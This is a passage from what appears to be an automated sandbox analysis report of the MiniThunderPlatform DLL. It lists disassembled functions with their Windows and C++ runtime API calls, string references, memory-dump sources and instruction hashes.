                                                                                                                                                • Part of subcall function 10093F80: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?,?), ref: 10093FF5
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10094009
                                                                                                                                                • Part of subcall function 10093F80: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009401B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100983DC
                                                                                                                                                • Part of subcall function 100970D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10097132
                                                                                                                                                • Part of subcall function 100970D0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 10097149
                                                                                                                                                • Part of subcall function 100970D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 10097164
                                                                                                                                                • Part of subcall function 100970D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10098303
                                                                                                                                              • ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0), ref: 1009840B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1009842F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$D@1@@std@@V01@@V?$basic_string@$??$?8D@2@@0@$??$?9D@2@@0@0@
                                                                                                                                              • String ID: Set-Cookie
                                                                                                                                              • API String ID: 3682374639-497240083
                                                                                                                                              • Opcode ID: 92466aedf9ecdb0d1754a56b9401ba56b33810d1230a1fb8d230b3129055c7df
                                                                                                                                              • Instruction ID: be0fb6f89ed63f522c52c7b02403112634cd268ef1a7ea2e78ce33ec2e8abbd3
                                                                                                                                              • Opcode Fuzzy Hash: 92466aedf9ecdb0d1754a56b9401ba56b33810d1230a1fb8d230b3129055c7df
                                                                                                                                              • Instruction Fuzzy Hash: A3215E362083419FD314CB64C898AAFF7E8EFA9744F00491DF58A43292DB75A549CB63
                                                                                                                                              Function 1002C060 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 1002C092
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1002C09D
                                                                                                                                                • Part of subcall function 1000F130: _ultoa.MSVCR71 ref: 1000F157
                                                                                                                                                • Part of subcall function 1000F130: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1000F167
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1002C0C7
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                                • Part of subcall function 1002BD70: ??0exception@@QAE@XZ.MSVCR71(?,?,00000000,102423C9,000000FF,1021B19D,00000000,?,10056267), ref: 1002BD8D
                                                                                                                                                • Part of subcall function 1002BD70: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1002BDA9
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6AA0), ref: 1002C100
                                                                                                                                              Strings
                                                                                                                                              • WideCharToMultiByte call error, code:, xrefs: 1002C0B3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$V01@@$??0exception@@??1?$basic_string@?append@?$basic_string@ByteCharErrorExceptionH_prologLastMultiThrowV12@V12@@Wide_ultoa
                                                                                                                                              • String ID: WideCharToMultiByte call error, code:
                                                                                                                                              • API String ID: 1327079663-1874611114
                                                                                                                                              • Opcode ID: 924ee80860dff7a6395e3930a58e94195e360d3038da1eb9a2ef7a6c5af8a878
                                                                                                                                              • Instruction ID: f5ca69296ba0dca091106663d126832110e4c3740e56fe3cf692da88174db2fa
                                                                                                                                              • Opcode Fuzzy Hash: 924ee80860dff7a6395e3930a58e94195e360d3038da1eb9a2ef7a6c5af8a878
                                                                                                                                              • Instruction Fuzzy Hash: 1C118275104240AFE321DBA4DC49F9BBBE8FB59B44F50860DF55992281DB78A508CB72
                                                                                                                                              Function 1001103C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCR71(?,00000000,00000208,10311990), ref: 10011061
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,10311990), ref: 1001106B
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,10311990), ref: 1001107E
                                                                                                                                              • wcscpy.MSVCR71(1001138B,0000005C,?,?,10311990), ref: 100110BA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Module$FileHandleNamememsetwcscpy
                                                                                                                                              • String ID: \
                                                                                                                                              • API String ID: 2319185427-2967466578
                                                                                                                                              • Opcode ID: 21a6e733fe72a8e0d89d6a137cf1f4f2bd3a70af9ac86e90b66769d7bf5a28ad
                                                                                                                                              • Instruction ID: f7bd7b91f63326efba3cfb8ce623a8d9ce10a874099c6e754b7b46ac32cf4be4
                                                                                                                                              • Opcode Fuzzy Hash: 21a6e733fe72a8e0d89d6a137cf1f4f2bd3a70af9ac86e90b66769d7bf5a28ad
                                                                                                                                              • Instruction Fuzzy Hash: 3A01D671E00218EBDB19DBA0DC4DBDD33A8EF0C315F504659E515CA0D2EBB1DAC48B51
                                                                                                                                              Function 100E1090 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 100E10B1
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 100E10C3
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100E10DE
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 100E10FB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 113201077-3788999226
                                                                                                                                              • Opcode ID: b30836a936606d9f8410397372d82ea8a92e8c95af505c9c7349d06f94935257
                                                                                                                                              • Instruction ID: 0aba9ac9af92d6eedb8bd28daff53a4c0a53a7e73e01bd7618f21e88c996ae9f
                                                                                                                                              • Opcode Fuzzy Hash: b30836a936606d9f8410397372d82ea8a92e8c95af505c9c7349d06f94935257
                                                                                                                                              • Instruction Fuzzy Hash: 2601E4B4008281DFC320DF54C998B5ABBE4FB5D708F108A4CF49A87690D776A519CF22
                                                                                                                                              Function 10080040 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 10080061
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 10080073
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1008008E
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 100800AB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 113201077-3788999226
                                                                                                                                              • Opcode ID: e6655c3448a2bdc650e6f244d2b9f6b718284dd7009dddb7059d61ef251e4b13
                                                                                                                                              • Instruction ID: 44ea750377cd67bbda49f5cdab0d6303e054668bcb414c175ac8284b0608dc2b
                                                                                                                                              • Opcode Fuzzy Hash: e6655c3448a2bdc650e6f244d2b9f6b718284dd7009dddb7059d61ef251e4b13
                                                                                                                                              • Instruction Fuzzy Hash: 75F017B10082919FC325DF54C84CB5BBBE4FB6D708F408A0CF4AA92680D7B69109CF23
                                                                                                                                              Function 100940C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long,?,?,?,?,?,?,?,?,?,?,1024AB32,000000FF,10096040,?,00000020), ref: 100940E1
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 100940F3
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1009410E
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1009412B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 113201077-3788999226
                                                                                                                                              • Opcode ID: c20c4a56a80cae5fceb4a8170d49cf6e9a5572845a1faa3bddd4c73a2813acda
                                                                                                                                              • Instruction ID: 794648e12ff78e182a2ed5275bf697a7bdde7b63e20b13f57bbda3f7476d6d41
                                                                                                                                              • Opcode Fuzzy Hash: c20c4a56a80cae5fceb4a8170d49cf6e9a5572845a1faa3bddd4c73a2813acda
                                                                                                                                              • Instruction Fuzzy Hash: 75F0F4B10082819FC325DF54C84CB5ABBE4FB6D708F408A0CF4AA92680C7769109CF23
                                                                                                                                              Function 10009180 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 100091A1
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 100091B3
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 100091CE
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 100091EB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 113201077-3788999226
                                                                                                                                              • Opcode ID: 966fbdebdbe0c95763270b6d4488c7f000a15184868894c892b8a1f4e786fad6
                                                                                                                                              • Instruction ID: 526898142a79738013431e79881c7124326718d0408f4a7664e14303b6898670
                                                                                                                                              • Opcode Fuzzy Hash: 966fbdebdbe0c95763270b6d4488c7f000a15184868894c892b8a1f4e786fad6
                                                                                                                                              • Instruction Fuzzy Hash: 8BF0F4B10082819FC321DB54C84CB5ABBE4FB6D709F408A0CF4AA52680C77A9109CF23
                                                                                                                                              Function 100851E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 10085201
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 10085213
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1008522E
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1008524B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 113201077-3788999226
                                                                                                                                              • Opcode ID: 5e1764e3cc5cd767f029897600890de77f7a0aa55b52eb6240143e3d3da8313c
                                                                                                                                              • Instruction ID: 600ad6008c29ac98e185794c1c61ff26b3c89d1394ac4b556b4b601005856f2c
                                                                                                                                              • Opcode Fuzzy Hash: 5e1764e3cc5cd767f029897600890de77f7a0aa55b52eb6240143e3d3da8313c
                                                                                                                                              • Instruction Fuzzy Hash: CFF017B10082819FC325DF64C84CB5BBBE4FB6D708F408A0CF4AA92680D7769109CF23
                                                                                                                                              Function 10060350 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 10060371
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 10060383
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1006039E
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 100603BB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 113201077-3788999226
                                                                                                                                              • Opcode ID: ed47d064897ddc694b3ccccc7af98bcf8584c0640ad7df881db81f28ab35ddb1
                                                                                                                                              • Instruction ID: c4f26eda1930d1fc0f25cf00291cef08e894f958d409cefbcb0418c7acdc0dce
                                                                                                                                              • Opcode Fuzzy Hash: ed47d064897ddc694b3ccccc7af98bcf8584c0640ad7df881db81f28ab35ddb1
                                                                                                                                              • Instruction Fuzzy Hash: FCF0F4B10082919FC325DB94C84CB5ABBE4FB6D708F408A0CF4AA92680C7769109CF23
                                                                                                                                              Function 100683E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(deque<T> too long,?,?,?,?,?,?,?,?,?,?,?,?,10246622,000000FF,10068910), ref: 10068401
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 10068413
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1006842E
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1006844B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: deque<T> too long
                                                                                                                                              • API String ID: 113201077-309773918
                                                                                                                                              • Opcode ID: 286ff7d1d792b442532c5e472fc7082cabd1c33ef9cb0728840e9f0129aa02be
                                                                                                                                              • Instruction ID: 9cc61e7f4038a94c5d9db9b22f429675163429a1e483fd8132820c18e578de3d
                                                                                                                                              • Opcode Fuzzy Hash: 286ff7d1d792b442532c5e472fc7082cabd1c33ef9cb0728840e9f0129aa02be
                                                                                                                                              • Instruction Fuzzy Hash: AEF0F4710082819FC325DB54C85CB5ABBE8FB69708F448A0CF4AA92680CB7A9109CF23
                                                                                                                                              Function 10079630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(vector<T> too long), ref: 10079651
                                                                                                                                              • ??0exception@@QAE@XZ.MSVCR71 ref: 10079663
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 1007967E
                                                                                                                                              • _CxxThrowException.MSVCR71(102768C4,102B1FC0), ref: 1007969B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0exception@@ExceptionThrowV01@@
                                                                                                                                              • String ID: vector<T> too long
                                                                                                                                              • API String ID: 113201077-3788999226
                                                                                                                                              • Opcode ID: a664b59c4351160bb4c87f6fcb3926645d0448a2b931a580f68465f5a3e16753
                                                                                                                                              • Instruction ID: 875b51f043f68d75cd0ad055408fc7f5bb61944d4fd079367e3ebb2d3d1a5907
                                                                                                                                              • Opcode Fuzzy Hash: a664b59c4351160bb4c87f6fcb3926645d0448a2b931a580f68465f5a3e16753
                                                                                                                                              • Instruction Fuzzy Hash: EDF017B10082819FC325DF64C84CB5BBBE4FB6D708F408A0CF4AA92680D7B69109CF23
                                                                                                                                              Function 100240AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100240B2
                                                                                                                                                • Part of subcall function 10023F17: RtlEnterCriticalSection.NTDLL(?), ref: 10023F26
